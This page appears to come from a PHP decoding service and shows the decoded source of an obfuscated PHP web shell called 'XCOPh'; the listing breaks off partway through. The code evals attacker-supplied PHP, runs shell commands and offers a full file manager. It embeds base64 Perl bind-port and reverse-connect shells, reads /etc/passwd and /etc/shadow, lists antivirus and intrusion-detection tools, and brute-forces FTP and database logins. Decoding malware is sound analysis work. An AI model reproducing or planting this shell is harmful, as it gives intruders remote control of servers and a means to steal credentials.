Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto Ee655; Ed7d4: if (!$safe_mode) { error_reporting(0); } goto fe968; Ac31d: if (strtolo..
Decoded Output download
<? goto Ee655; Ed7d4: if (!$safe_mode) { error_reporting(0); } goto fe968; Ac31d: if (strtolower(substr(PHP_OS, 0, 3)) ==
"win") { $os = 'win'; } else { $os = 'nix'; } goto E8593; a26d7: @set_time_limit(0); goto c36e0; F9bd1: function
actionPhp() { goto A57d8; a04f8: XCOPhHeader(); goto A8bca; fa21a: if (!empty($_POST['p1'])) { goto B78d9; eca1d: echo
htmlspecialchars(ob_get_clean()); goto a75e2; af505: eval($_POST['p1']); goto eca1d; B78d9: ob_start(); goto af505;
a75e2: } goto f5c51; f5c51: echo '</pre>
</div>'; goto d34f9; d34f9: XCOPhFooter(); goto c4698; Fc1c9: if (empty($_POST['ajax']) && !empty($_POST['p1'])) {
XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto a04f8; E3f36: echo '<h1>Execution PHP-code</h1>
<div class=content>
<form name=pf method=post
onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;">
<textarea name=code class=bigarea
id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit
value=Eval style="margin-top:5px">'; goto ed606; A57d8: if (isset($_POST['ajax'])) { goto c21d6; f56a9: echo
strlen($temp), "
", $temp; goto b85c3; A0bbb: $temp =
"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" .
addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
"; goto f56a9; c21d6:
XCOPhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto A6105; A6105: ob_start(); goto Eaf53; b85c3:
exit; goto c2252; Eaf53: eval($_POST['p1']); goto A0bbb; c2252: } goto Fc1c9; ed606: echo ' <input type=checkbox
name=ajax value=1 ' . ($_COOKIE[md5($_SERVER[' HTTP_HOST']) . 'ajax' ] ? 'checked' : '' )
. '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '' )
. 'margin-top:5px;" class=ml1>' ; goto fa21a; A8bca: if (isset($_POST['p2']) && $_POST['p2']=='info' ) {
goto B177d; Ed3a4: $tmp=preg_replace(array('!(body|a:\w+|body, td, th, h1, h2)
{.*}!msiU', '!td, th {(.*)}!msiU' , '!<img[^>]+>!msiU' ), array('', '.e, .v, .h, .h th {$1}' , '' ), $tmp);
goto bc860; Ec74d: ob_start(); goto C7749; bc860: echo str_replace('<h1', '<h2' , $tmp) . '</div><br>' ;
goto Ad70c; C7749: phpinfo(); goto f2bf4; B177d:
echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>' ; goto Ec74d; f2bf4:
$tmp=ob_get_clean(); goto Ed3a4; Ad70c: } goto E3f36; c4698: } goto B7a38; C15ee: if (empty($_POST['a'])) {
if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a']=$default_action; }
else { $_POST['a']='SecInfo' ; } } goto a25c3; A54db: if ($os=='win' ) { $home_cwd=str_replace("\", "/" ,
$home_cwd); $cwd=str_replace("\", "/" , $cwd); } goto E8eb6; e3323: if (!empty($auth_pass)) { if
(isset($_POST['pass']) && md5($_POST['pass'])==$auth_pass) { XCOPhsetcookie(md5($_SERVER['HTTP_HOST']),
$auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])]
!=$auth_pass) { XCOPhLogin(); } } goto Ac31d; c36e0: if (get_magic_quotes_gpc()) { goto F86e9; F86e9:
function XCOPhstripslashes($array) { return is_array($array) ? array_map('XCOPhstripslashes', $array) :
stripslashes($array); } goto F14fd; F14fd: $_POST=XCOPhstripslashes($_POST); goto D293a; D293a:
$_COOKIE=XCOPhstripslashes($_COOKIE); goto A617b; A617b: } goto E6a75; A2f53: $default_action='FilesMan' ;
goto b92e5; d0f5d: $home_cwd=@getcwd(); goto D7aba; Dc592: function actionFilesTools() { goto E4815; B0a3c:
if (!file_exists(@$_POST['p1'])) { goto E290e; E290e: echo 'File not exists' ; goto f943f; f943f:
XCOPhFooter(); goto ce307; ce307: return; goto Af8b9; Af8b9: } goto a6106; a939b: echo '</div>' ; goto
C4f22; D0447: cbceb: goto a939b; D5333: echo '<span>Name:</span> ' .
htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ?
XCOPhViewSize(filesize($_POST['p1'])) : '-' ) . ' <span>Permission:</span> ' . XCOPhPermsColor($_POST['p1'])
. ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>' ; goto Be37b; C4f22:
XCOPhFooter(); goto E91c1; Ebcfc: b0f96: goto D0447; C9755: XCOPhHeader(); goto c26e0; Ce3d1: if (!$uid) {
$uid['name']=@fileowner($_POST['p1']); $gid['name']=@filegroup($_POST['p1']); } else {
$gid=@posix_getgrgid(@filegroup($_POST['p1'])); } goto D5333; aecf6: if (is_file($_POST['p1'])) {
$m=array('View', 'Highlight' , 'Download' , 'Hexdump' , 'Edit' , 'Chmod' , 'Rename' , 'Touch' ); } else {
$m=array('Chmod', 'Rename' , 'Touch' ); } goto e3049; afd3c: switch ($_POST['p2']) { case 'view' : goto
B92ac; B92ac: echo '<pre class=ml1>' ; goto eb7ce; deae8: echo '</pre>' ; goto C8a7c; eaea7: if ($fp) { goto
a27be; f1788: Ee035: goto Dd409; Cc94d: goto Af4cf; goto f1788; a27be: Af4cf: goto Db5e4; c763c: echo
htmlspecialchars(@fread($fp, 1024)); goto Cc94d; Db5e4: if (@feof($fp)) { goto Ee035; } goto c763c; Dd409:
@fclose($fp); goto e0b59; e0b59: } goto deae8; eb7ce: $fp=@fopen($_POST['p1'], 'r' ); goto eaea7; C8a7c:
goto cbceb; goto D1959; D1959: case 'highlight' : if (@is_readable($_POST['p1'])) { goto C34cb; A975b: echo
str_replace(array('<span ', ' </span>'), array('<font ', ' </font>'), $code) . '
</div>'; goto Ca189; f16cd: $code = @highlight_file($_POST['p1'], true); goto A975b; C34cb: echo '<div class=ml1
style="background-color: #e1e1e1;color:black;">'; goto f16cd; Ca189: } goto cbceb; case 'chmod': goto B1130; B0cd7:
clearstatcache(); goto d85a1; B1130: if (!empty($_POST['p3'])) { goto f55b6; d19de: --$i; goto e4e5b; E9fe0: $i =
strlen($_POST['p3']) - 1; goto b048a; b048a: fd939: goto Ffa0f; f55b6: $perms = 0; goto E9fe0; fd581: Aa00e: goto
d19de; a400e: a252a: goto D7dd9; e4e5b: goto fd939; goto a400e; D7dd9: if (!@chmod($_POST['p1'], $perms)) { echo
'Can\'t set permissions!<br>
<script>document.mf.p3.value = "";</script>'; } goto b9c9a; Ffa0f: if (!($i >= 0)) { goto a252a; } goto af767; af767:
$perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto fd581; b9c9a: } goto B0cd7; c458f:
goto cbceb; goto Bf288; d85a1: echo '
<script>p3_ = "";</script>
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input
type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit
value=">>"></form>'; goto c458f; Bf288: case 'edit': goto F2d14; F443c: echo '<form
onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea
name=text
class=bigarea>'; goto ab40c; F2d14: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto cbceb; } goto f150c; c00fa: if ($fp) { goto afe0d; e8426: goto a38e2; goto d0997; d0997: Fb7d8: goto Aacf4; A7c99: echo htmlspecialchars(@fread($fp, 1024)); goto e8426; c1945: if (@feof($fp)) { goto Fb7d8; } goto A7c99; afe0d: a38e2: goto c1945; Aacf4: @fclose($fp); goto Ef695; Ef695: } goto Dbff1; C5bba: goto cbceb; goto a449d; Dbff1: echo '</textarea><input
type=submit value=">>"></form>'; goto C5bba; f150c: if (!empty($_POST['p3'])) { goto a1a61; e8f90: if ($fp)
{ goto C21c4; D7a87: @touch($_POST['p1'], $time, $time); goto f87bf; e57da: echo 'Saved!<br>
<script>p3_ = "";</script>'; goto D7a87; C21c4: @fwrite($fp, $_POST['p3']); goto d12c3; d12c3: @fclose($fp); goto
e57da; f87bf: } goto D19bb; A467d: $_POST['p3'] = substr($_POST['p3'], 1); goto E337d; a1a61: $time =
@filemtime($_POST['p1']); goto A467d; E337d: $fp = @fopen($_POST['p1'], "w"); goto e8f90; D19bb: } goto F443c;
ab40c: $fp = @fopen($_POST['p1'], 'r'); goto c00fa; a449d: case 'hexdump': goto ba42c; B882a: goto cbceb; goto
cfeb7; d3c39: a3f2a: goto Fba99; Ccd63: c8ba6: goto ab794; Bccad: if (!($i < $len)) { goto f7582; } goto D2df7;
ab794: ++$i; goto d491b; f0831: $len=strlen($c); goto cd187; bf2e0: switch (ord($c[$i])) { case 0: $h[2] .=' ' ;
goto a3f2a; case 9: $h[2] .=' ' ; goto a3f2a; case 10: $h[2] .=' ' ; goto a3f2a; case 13: $h[2] .=' ' ; goto
a3f2a; default: $h[2] .=$c[$i]; goto a3f2a; } goto Dcb38; a8336: f7582: goto F7ad4; D2df7: $h[1]
.=sprintf('%02X', ord($c[$i])) . ' ' ; goto bf2e0; B6d66: $h=array('00000000<br>', '', ''); goto f0831; d491b:
goto c89fb; goto a8336; F7ad4: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222>
<tr>
<td bgcolor=#333333><span style="font-weight: normal;">
<pre>' . $h[0] . '</pre>
</span></td>
<td bgcolor=#282828>
<pre>' . $h[1] . '</pre>
</td>
<td bgcolor=#333333>
<pre>' . htmlspecialchars($h[2]) . '</pre>
</td>
</tr>
</table>'; goto B882a; dd29d: if ($n == 32) { goto D95fd; D95fd: $n = 0; goto c6b11; D5260: $h[1] .= '<br>';
goto Efc24; c6b11: if ($i + 1 < $len) { $h[0] .=sprintf('%08X', $i + 1) . '<br>' ; } goto D5260; Efc24: $h[2]
.="
" ; goto Fce07; Fce07: } goto Ccd63; ba42c: $c=@file_get_contents($_POST['p1']); goto e7ed9; Dcb38:
C57bc: goto d3c39; Fba99: $n++; goto dd29d; cd187: $i=0; goto Be4f6; Be4f6: c89fb: goto Bccad; e7ed9: $n=0;
goto B6d66; cfeb7: case 'rename' : goto a5b5c; a5b5c: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'],
$_POST['p3'])) { echo 'Can\' t rename!<br>'; } else { die('
<script>g(null, null, "' . urlencode($_POST['p3']) . '", null, "")</script>'); } } goto bde56; Ed4ed: goto
cbceb; goto d2377; bde56: echo '<form
onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input
type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>">
</form>'; goto Ed4ed; d2377: case 'touch': goto E2fd4; febed: echo '
<script>p3_ = "";</script>
<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input
type=text name=touch value="' . date(" Y-m-d H:i:s", @filemtime($_POST['p1']))
. '"><input type=submit value=">>"></form>' ; goto Ea432; E2fd4: if (!empty($_POST['p3'])) {
$time=strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!' ;
} else { echo 'Touched!' ; } } else { echo 'Bad time format!' ; } } goto B7f1e; B7f1e:
clearstatcache(); goto febed; Ea432: goto cbceb; goto Bef27; Bef27: } goto Ebcfc; eef38:
echo '<br><br>' ; goto afd3c; Be37b: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s',
filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s',
fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s',
filemtime($_POST['p1'])) . '<br><br>' ; goto B3570; F2001: c9914: goto eef38; B3570: if
(empty($_POST['p2'])) { $_POST['p2']='view' ; } goto aecf6; a6106:
$uid=@posix_getpwuid(@fileowner($_POST['p1'])); goto Ce3d1; e3049: foreach ($m as $v) {
echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST[' p1']) . '\' ,\'' . strtolower($v)
. '\' )">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; d0da1: }
goto F2001; E4815: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto D77ce;
D77ce: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
goto B2bb7; f5391: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto
Badf8; D1cc1: if ($fp) { goto d6ec3; Eb119: if (@feof($fp)) { goto Be4b8; } goto d7ee8; d6ec3: f7fab:
goto Eb119; E53d9: goto f7fab; goto D1129; c14a5: fclose($fp); goto d119c; D1129: Be4b8: goto c14a5;
d7ee8: echo @fread($fp, 1024); goto E53d9; d119c: } goto C7561; B2bb7: ob_start("ob_gzhandler", 4096);
goto f5391; Badf8: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']);
header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto
f08dc; f08dc: $fp = @fopen($_POST['p1'], "r"); goto D1cc1; C7561: } exit; } goto Aea14; c26e0: echo '
<h1>File tools</h1>
<div class=content>'; goto B0a3c; Aea14: if (@$_POST['p2'] == 'mkfile') { if
(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit";
fclose($fp); } } } goto C9755; E91c1: } goto cb8a1; Ee655: error_reporting(0); goto C6f8b; B626d:
function actionNetwork() { goto D410e; F99c0: echo "<h1>Network tools</h1>
<div class=content>
<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return
false;\">
<span>Bind port to /bin/sh [perl]</span><br />
Port: <input type='text'
name='port' value='31337'> <input type=submit value='>>'>
</form>
<form
name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br />
Server: <input type='text' name='server'
value='" . $_SERVER[' REMOTE_ADDR']
. "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form><br>"
; goto B3a71; B686c: XCOPhFooter(); goto c688a; B3a71: if (isset($_POST['p1'])) { goto
d8c88; d8c88: function cf($f, $t) { $w=@fopen($f, "w" ) or
@function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t));
@fclose($w); } } goto ea60e; ea60e: if ($_POST['p1']=='bpp' ) { goto E8b5f; caed0:
sleep(1); goto c607c; E8b5f: cf("/tmp/bp.pl", $bind_port_p); goto a275b; f804b:
unlink("/tmp/bp.pl"); goto Dda97; a275b: $out=XCOPhEx("perl
/tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto caed0; c607c: echo "
<pre class=ml1>{$out}
" . XCOPhEx("ps aux | grep bp.pl") . "</pre>"; goto f804b; Dda97: }
goto dfe7c; dfe7c: if ($_POST['p1'] == 'bcp') { goto bb299; bb299: cf("/tmp/bc.pl",
$back_connect_p); goto fd4d4; Cd448: sleep(1); goto F3cb8; F3cb8: echo "
<pre class=ml1>{$out}
" . XCOPhEx("ps aux | grep bc.pl") . "</pre>"; goto Feb68; fd4d4:
$out = XCOPhEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1
&"); goto Cd448; Feb68: unlink("/tmp/bc.pl"); goto a4948; a4948: } goto B6225; B6225: } goto
F45a0; F301c: $bind_port_p =
"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
goto F99c0; F45a0: echo '</div>'; goto B686c; D410e: XCOPhHeader(); goto E7a5e; E7a5e:
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
goto F301c; c688a: } goto Faf84; A9559: @ini_set('max_execution_time', 0); goto a26d7; E579f:
function XCOPhScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto
ddd68; be10d: E609b: goto c5288; A56c8: $files[] = $filename; goto f2e49; f2e49: goto E609b; goto
Cd888; Cd888: e05c7: goto ad15d; ad15d: return $files; goto F240e; ddd68: $dh = opendir($dir); goto
be10d; c5288: if (!(false !== ($filename = readdir($dh)))) { goto e05c7; } goto A56c8; F240e: } }
goto b3a8a; Faf84: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(),
"php_version" => phpversion(), "XCOPh_version" => XCOPh_VERSION, "safemode" =>
@ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto C15ee; Dfd08:
$color = "#df5"; goto A2f53; D59f0: function actionSecInfo() { goto Af902; de7f3: echo '
</div>'; goto F46cf; e6858: if (function_exists('apache_get_modules')) { XCOPhSecParam('Loaded Apache
modules', implode(', ', apache_get_modules())); } goto C5fa7; a9fe3: function XCOPhSecParam($n, $v) { $v
= trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "
") === false) { echo $v .
'<br>'; } else { echo '
<pre class=ml1>' . $v . '</pre>'; } } } goto e6f9d; ff508: if (function_exists('mssql_connect')) {
$temp[] = "MSSQL"; } goto b7391; b7391: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; }
goto e9971; d17d2: XCOPhSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto Ea482;
F8397: XCOPhSecParam('Supported databases', implode(', ', $temp)); goto a91ee; Fab09: if ($GLOBALS['os']
== 'nix') { goto D5a13; E7ab5: XCOPhSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto
e753b; B7c40: XCOPhSecParam('OS version', @file_get_contents('/proc/version')); goto E7ab5; a3532:
XCOPhSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#'
onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto B7c40; e753b: if
(!$GLOBALS['safe_mode']) { goto Bdb9f; d188c: XCOPhSecParam('Downloaders', implode(', ', $temp)); goto
dc721; Af8d9: $temp = array(); goto E03f6; Bfe41: $danger = array('kav', 'nod32', 'bdcored', 'uvscan',
'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc',
'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask',
'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto Dbe95; a1d3a: echo '<br /><span>posix_getpwuid ("Read"
/etc/passwd)</span>
<table>
<form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'>
<tr>
<td>From</td>
<td><input type=text name=param1 value=0></td>
</tr>
<tr>
<td>To</td>
<td><input type=text name=param2 value=1000></td>
</tr>
</table><input type=submit value=">>">
</form>'; goto C472b; Adcaa: foreach ($downloaders as $item) { if (XCOPhWhich($item)) { $temp[] = $item; }
e0292: } goto e4d8d; C472b: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) &&
is_numeric($_POST['p3'])) { goto a9f5c; e41b1: Ca86a: goto e78f2; e78f2: echo '<br />'; goto e3a42; ee7d9:
Fda09: goto Fc4e7; b2bd8: if ($uid) { $temp .= join(':', $uid) . "
"; } goto b4471; A3542: $uid =
@posix_getpwuid($_POST['p2']); goto b2bd8; a9f5c: $temp = ""; goto ee7d9; Fc4e7: if (!($_POST['p2'] <=
$_POST['p3'])) { goto Ca86a; } goto A3542; b4471: fe701: goto F469f; E7677: goto Fda09; goto e41b1;
F469f: $_POST['p2']++; goto E7677; e3a42: XCOPhSecParam('Users', $temp); goto Deb8d; Deb8d: } goto
b9a39; dc721: echo '<br/>' ; goto f9a4d; Dd677: d60ad: goto ae869; Dbe95:
$downloaders=array('wget', 'fetch' , 'lynx' , 'links' , 'curl' , 'get' , 'lwp-mirror' ); goto dfc85;
A5886: XCOPhSecParam('Hosts', @file_get_contents('/etc/hosts')); goto a1d3a; Bdb9f:
$userful=array('gcc', 'lcc' , 'cc' , 'ld' , 'make' , 'php' , 'perl' , 'python' , 'ruby' , 'tar' , 'gzip'
, 'bzip' , 'bzip2' , 'nc' , 'locate' , 'suidperl' ); goto Bfe41; F6592: $temp=array(); goto fb4bf;
fb4bf: foreach ($userful as $item) { if (XCOPhWhich($item)) { $temp[]=$item; } da597: } goto D4cac;
f9a4d: XCOPhSecParam('HDD space', XCOPhEx('df -h')); goto A5886; E03f6: foreach ($danger as $item) { if
(XCOPhWhich($item)) { $temp[]=$item; } De04f: } goto Dd677; D4cac: fba82: goto Ad966; dfc85: echo '<br>'
; goto F6592; e4d8d: Cb176: goto d188c; Ad966: XCOPhSecParam('Userful',
implode(', ', $temp)); goto Af8d9; ae869: XCOPhSecParam(' Danger',
implode(', ', $temp)); goto Ff111; Ff111: $temp = array(); goto Adcaa; b9a39: } goto d95f0; D5a13: XCOPhSecParam('
Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\" FilesTools\",
\"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto a3532; d95f0: } else { goto b23e0; b23e0:
XCOPhSecParam('OS Version', XCOPhEx('ver')); goto debff; debff: XCOPhSecParam('Account Settings',
XCOPhEx('net accounts')); goto ccc27; ccc27: XCOPhSecParam('User Accounts', XCOPhEx('net user')); goto
c3094; c3094: } goto de7f3; C5fa7: XCOPhSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']
? $GLOBALS['disable_functions'] : 'none'); goto b352c; e6f9d: XCOPhSecParam('Server software',
@getenv('SERVER_SOFTWARE')); goto e6858; Af902: XCOPhHeader(); goto C93a5; B9040: if
(function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto
ff508; e9971: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto F8397; Ea482:
XCOPhSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto a854d; b352c:
XCOPhSecParam('Open base dir', @ini_get('open_basedir')); goto d17d2; a91ee: echo '<br>'; goto Fab09;
a854d: XCOPhSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto f15be;
C93a5: echo '<h1>Server security information</h1>
<div class=content>'; goto a9fe3; f15be: $temp = array(); goto B9040; F46cf: XCOPhFooter(); goto f7157;
f7157: } goto F9bd1; e7b25: function XCOPhPerms($p) { goto bedee; bff24: $i .= $p & 0x2 ? 'w' : '-';
goto eba42; B1c2a: $i .= $p & 0x100 ? 'r' : '-'; goto b4313; eba42: $i .= $p & 0x1 ? $p & 0x200 ?
't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto E7174; b4313: $i .= $p & 0x80 ? 'w' : '-'; goto C6397;
bedee: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; }
elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif
(($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p &
0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto B1c2a; A99c3: $i .= $p & 0x20 ? 'r' : '-';
goto b5989; b5989: $i .= $p & 0x10 ? 'w' : '-'; goto e9073; E7174: return $i; goto B9e56; f4d72: $i
.= $p & 0x4 ? 'r' : '-'; goto bff24; e9073: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ?
'S' : '-'); goto f4d72; C6397: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-');
goto A99c3; B9e56: } goto Ab33f; fe968: $disable_functions = @ini_get('disable_functions'); goto
d0f5d; D7aba: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto Aaf31; D16d3: function
XCOPhEx($in) { goto abfb7; E4e8e: if (function_exists('exec')) { @exec($in, $out); $out =
@join("
", $out); } elseif (function_exists('passthru')) { goto e995a; e995a: ob_start(); goto
ed4d3; Ddfba: $out = ob_get_clean(); goto Df067; ed4d3: @passthru($in); goto Ddfba; Df067: } elseif
(function_exists('system')) { goto f9ace; b7c66: $out = ob_get_clean(); goto Ffb6d; f9ace:
ob_start(); goto a5407; a5407: @system($in); goto b7c66; Ffb6d: } elseif
(function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,
"r"))) { goto A52af; ae64e: if (@feof($f)) { goto De20e; } goto ec35d; A52af: $out = ""; goto bb9af;
B4238: pclose($f); goto a61eb; e9d3a: goto C225f; goto bdaa6; bb9af: C225f: goto ae64e; ec35d: $out
.= fread($f, 1024); goto e9d3a; bdaa6: De20e: goto B4238; a61eb: } goto Ecaa0; Ecaa0: return $out;
goto fb352; abfb7: $out = ''; goto E4e8e; fb352: } goto B2753; b92e5: $default_use_ajax = true; goto
e80d6; e6d6e: function actionBruteforce() { goto d7768; e5fa3: if (isset($_POST['proto'])) { goto
a7921; bae18: $success = 0; goto a06bf; f9b7a: if ($_POST['proto'] == 'ftp') { function
XCOPhBruteForce($ip, $port, $login, $pass) { goto C66f5; e435e: if (!$fp) { return false; } goto
f1f6e; C66f5: $fp = @ftp_connect($ip, $port ? $port : 21); goto e435e; C0066: return $res; goto
a5a3f; f1f6e: $res = @ftp_login($fp, $login, $pass); goto fe3eb; fe3eb: @ftp_close($fp); goto C0066;
a5a3f: } } elseif ($_POST['proto'] == 'mysql') { function XCOPhBruteForce($ip, $port, $login, $pass)
{ goto F8efb; F8efb: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto
Bc4e2; B7072: return $res; goto B0e6b; Bc4e2: @mysql_close($res); goto B7072; B0e6b: } } elseif
($_POST['proto'] == 'pgsql') { function XCOPhBruteForce($ip, $port, $login, $pass) { goto Fb8b4;
d3d54: @pg_close($res); goto ce8b9; F9c21: $res = @pg_connect($str); goto d3d54; Fb8b4: $str =
"host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "'
dbname=postgres"; goto F9c21; ce8b9: return $res; goto Fccfa; Fccfa: } } goto bae18; Cf254: echo
"<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto b9d69; F6593:
if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line)
{ goto a7fad; Bd85c: ++$attempts; goto d3acb; Dff80: if (@$_POST['reverse']) { goto fd74a; A1282: caa9b:
goto bbbee; fd74a: $tmp = ""; goto a7d3a; bbbee: ++$attempts; goto ed788; Dd453: $tmp .= $line[0][$i];
goto a3141; F8167: if (!($i >= 0)) { goto caa9b; } goto Dd453; ed788: if (XCOPhBruteForce(@$server[0],
@$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' .
htmlspecialchars($tmp); } goto Af4db; a3141: F275f: goto c8f4e; a7618: A2524: goto F8167; C9e8b: goto
